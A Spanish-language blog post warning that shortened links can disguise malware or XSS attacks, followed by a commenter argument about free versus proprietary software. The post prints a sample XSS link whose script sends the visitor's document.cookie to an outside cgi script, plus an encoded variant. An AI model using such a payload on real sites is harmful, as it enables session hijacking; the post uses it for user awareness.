Hoy en dia, gracias al furor que ha tenido twitter y otras redes sociales, se ha hecho muy comun utilizar paginas que nos brindan el servicio de acortar las direcciones. Este servicio es muy util, ya que nos permiten acortar aquellas urls, que son demasiado largas y que son dificiles de recordar. Su uso es muy sencillo solo basta con entrar a un sitio de tantos en la red que nos dan este servicio como por ejemplo: Bit.ly o tinyurl.com alli en una caja de texto pegamos la url que deseamos recortar damos click en el boton y listo tendremos nuestra url recortada, algo asi como esto:
http://bit.ly/4G4ueH
http://tinyurl.com/ykfuc64
Sin embargo, esto puede llegar a convertirse en un arma de doble filo, debido a que algun individuo de forma malintencionada puede “camuflar” una url infectada con algun troyano, o una url con un script que capture tus cookies (XSS). Y esto como ocurre?? Hay gente que puede caer en un truco tan viejo?? La respuesta es SI. Pongamos un ejemplo, un informatico ve que una nena muy linda, comparte un enlace de este tipo:
http://sitio.com/prueba.php?variable=”><script>document.location=’http://www.lugarscript.com/cgi-bin/cookie.cgi? ‘%20+document.cookie</script>
o este:
http://host/a.php?variable=%22%3e%3c%73%63%72%6d%65%6e%74%2e%6c%6f%63%61%74%69%6f%6e%3d%27%6
Para cualquier persona con sentido comun (bueno eso creo y espero) que vea este enlace, lo va a ver sospechoso y sabra que ese enlace no es lo que dice ser la nena linda. Pero que pasaria si se usa una web que nos recorta la url? Nuestro enlace malicioso quedaria asi:
http://bit.ly/2SOKtG
o asi:
http://bit.ly/3hPNpy
Ahora si, mas de una persona daria click en ese enlace, si la nena linda dice que en esa pequeña url se encuentran sus fotos desnuda. Igualmente suele suceder con el malware, muchas veces viene camuflado de esa forma, y algunas personas dan click sin pensar que hay detras de esa url corta.
Recomendaciones.
- Tener sentido comun, y no dar click en cualquier enlace.
- No visitar enlaces sospechosos compartidos por mujeres voluptuosas o en su defecto hombres.
- Antes de dar click en una url de este tipo, pase el puntero por el enlace, y este le va a mostrar la verdadera url, de tal forma, sabras hacia donde te lleva el enlace.
Estas son pequeñas cosas, pero que muchos usuarios de la red no lo saben, y son blancos faciles de todo el malware que existe en la red.
Paranoico?
Mal uso de los signos de puntuación.
No entiendo tu comentario, le estás corrigiendo faltas ortograficas o estás comentando por JLP?
Correcto!, eso esta pasando con algunos usuarios de facebook que sus PC están infectada y cuando se conectan envían una dirección corta de un virus. Ya tengo mucha gente que están infectados porque ellos dicen yo no estoy mandando esas direcciones con mensajes en ingles. Cuidence!
[quote]Estas son pequeñas cosas, pero que muchos usuarios de la red no lo saben, y son blancos faciles de todo el malware que existe en la red. [/quote]
Aqui ud se refiere a los usuarios de Software Libre, donde es un punto que usted nunca querra entender, por el hecho de que atente contra el modelo de negocio del Software Propietario.
Lamentablemente, cuando un pirata informatico se pasa al Software Libre, este rompe el paradigma del Software Propietario, osea, deja de ser pirata informatico y contribuye de una u otra forma con el Software Libre, por lo cual los “ataques” dejan de existir.
En mi caso he usado la pagina de acortar los link, pero para un proposito sano y promovedor (como es el Software Libre). y NUNCA me han tildado de pirata informatico ni nada por el estilo
Ing. Morrison, yo tambien soy Ing. y seria bueno que en algun momento ud promueva software libre (con distribuciones diferente a ubuntu).
Segun capto.. la supuesta forma correcta de promover Software Libre es degradandolo y hablando de este de forma desinformativa, por el mero hecho de que es la solucion real a los diferentes malware que existen hoy en dia.
El software libre al ser un proyecto muy grande, requiere de mucho tiempo de experiencia para luego deducir si este es un sistema de “fanaticos y radicales” (supuestamente), y personas que lo usan o no captan lo necesario y lo tratan con terminologias de software propietario (Windows), por lo cual esto produce que sea un falso software libre y que debe ser como windows.
Una norma no es lo mismo que un estandar, las normas se crean para regular, los estandares son de facto y se imponen hacia los que desconocen el sistema.
Sabe ud igual que yo de software libre??, de ser asi entonces entramos en debate
@Revolvtion OS, no sé cual será la opinion del Sr. Morrison, pero el software libre no da beneficios, hay cientos de blogs hablando de eso, y de lo mucho que ya estas distribuciones se van pareciendo más a Mac OS o Windows, siendo mas amigables con el usuario básico, el que genera ingresos a las compañias…
Miembros de mi organizacion de donde promovemos software libre, vivimos de lo Gratis y al mismo tiempo tenemos carro y yipetas, y te preguntas por que?? simplemente no hay nadie desconocedor que tome un empleo de sistemas Unix y GNU/Linux, donde se cotizan en precios (como poco 6 salarios minimos) exhorbitantes, entonces tenemos que tomarlos nosotros por obligacion y ademas subimos mas rapido en poco tiempo (averigua como se calcula el promedio de bateo (AVG) en beisbol), obviamente es la gallina de los huevos de oro que todos quieren matar.
Ademas cobramos por implementacion y migracion a sistemas POSIX (UNIX y sus derivados), que en el pais no hay otra empresa u organizacion que lo haga, por obligacion debemos ser nosotros y por eso somos los pioneros.
Revolvtion OS dime que de alardeas…
No digo que la implementación no sea beneficiosa, pero como mencionas, en el país existe muy pocas soluciones para estas implementaciones y migraciones teniendo que, compañías como en la que trabajo solicitar a empresas extranjeras con un background de “calibre” le hagan el trabajo sucio. Pero eso se queda ahí, en la parte empresarial, pero cuantas personas/usuarios básicos conoces que tengan en su casa alguna distribución de linux en cualquiera de sus sabores? 10, 20, quizá 30 personas, pero eso no es la norma, como dijo Steve Jobs cuando fundo Apple: “lo que quiero es un computador para gente normal, sin complicaciones, que sea un electrodoméstico más en la casa” y que crees, Linux no ha sido el culpable que en los últimos 10 años se haya multiplicado el uso del computador a nivel domestico y sin mencionar el empresarial…
Entonces si El linux que dices es como es, por que Microsoft y Apple no compran todos los proyectos y distribuciones linux?? no han podido en 19 años (y seguimos esperando), tambien seguimos en la espera de un “Blaster” que entre con normalidad en nuestro sistema (40 años y nada de eso ha pasado), esto no se queda ahi donde lo quieres colocar. A nosotros no nos preocupa migrar usuarios, nos preocupa migrar MENTES, que asi es mucho mejor. Y no vengan a decir que es porque lo usen en menor proporcion. Si compran a linux, pasara como paso a libreoffice.
Yo no alardeo de nada, solo estoy expresando mis conocimientos y filosofia de GNU Linux, la cual muy pocos saben
@Hairosv solo estoy dando mi opinión al respecto del uso de acortadores de direcciones URL. Pero ya que estamos en eso, encuentro un tanto exagerado la forma en que el Sr. Morrison expone sobre los peligros de utilizar estos acortadores, acortadores que el también utiliza en sus twitts. Tiene razón en que estas direcciones pueden ser utilizadas con otros propósitos, pero de ahi a que nos metan en la cabeza que cada vez que accedemos a internet alguien esta al asecho, esperando a ver como nos *&%de…es un poco exagerado, no es que no existan personas mal intencionadas, pero articulos como este nos retraen un poco y como dice el Sr. Morrison, vivimos en un país de muy poca educación tecnológica (casi el 75% de los dominicanos no tiene acceso a Internet) y aparte de eso le decimos al otro 25% que tenga extremo cuidado con las short URLs y verifiquen si cuando pasen el cursor por la dirección si se vé sospechosa o contiene algún script maligno, para mi es un poco exagerado. Claro esa es mi opinión.
Revolvtion OS Una pregunta, mencioname 2 empresas tecnológicas que estén mejor posicionadas que Apple y Microsoft? Google, es una y recuerda, que Android sea “libre” es una manera de distribuirlo más fácil, no porque a ellos le interesen que los usuarios anden toqueteando las entrañas del kernel…ejemplo vivo lo que esta sucediendo con Honeycomb, que si que es abierto, que es abierto a medias, que es cerrado, bueno, ellos lo resolverán…Pero el caso es que no estoy en contra del software libre, comparto algunos conceptos, pero como mencionas, son muy pocos….eso no es negocio, es monopolio.
Tu opinion es sobre un falso software libre que no existe….
Voy a utilizar una frase sobre su presidente (que no es el mio) cuando hablaba sobre el 4 % de la educacion…… AQUI NO HAY UN DEBATE… aqui lo que hay son muchos comentarios irrelevantes…
Mi presidente, el de los dominicanos…por desgracia.
Bueno, Saludos para todos… El tema es “el peligros de los acortadores de enlaces URL”… respeto sus comentarios, todos tiene vertientes diferentes con relación a los sistemas operativos, sean libres o no… El Sr. Morrison esta dando una noticia que le interesa a toda una comunidad de seguidores de esta pagina.
Por que mejor no aportamos informaciones relevantes y dejamos el debate de otro tema para otro momento? Estamos hablando de estos peligros de los enlaces…
Gracias